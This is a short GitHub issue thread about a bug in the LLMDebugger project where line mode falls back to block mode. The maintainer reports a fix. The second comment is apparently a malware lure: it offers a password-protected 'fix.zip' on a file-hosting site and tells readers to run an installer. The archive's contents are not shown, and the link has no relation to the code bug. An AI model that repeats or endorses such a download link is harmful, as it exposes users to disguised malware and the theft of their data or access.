### ISSUE TITLE
Line mode does not work, it is replaced by block mode

### ISSUE THREAD

**Issue by testcoder-ui** [FloridSleeves/LLMDebugger#13]
It seems because of this line

https://github.com/FloridSleeves/LLMDebugger/blob/main/programming/generators/py_generate.py#L175

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by FloridSleeves** [comment]
Thank you! The bug is fixed in c8fb8a
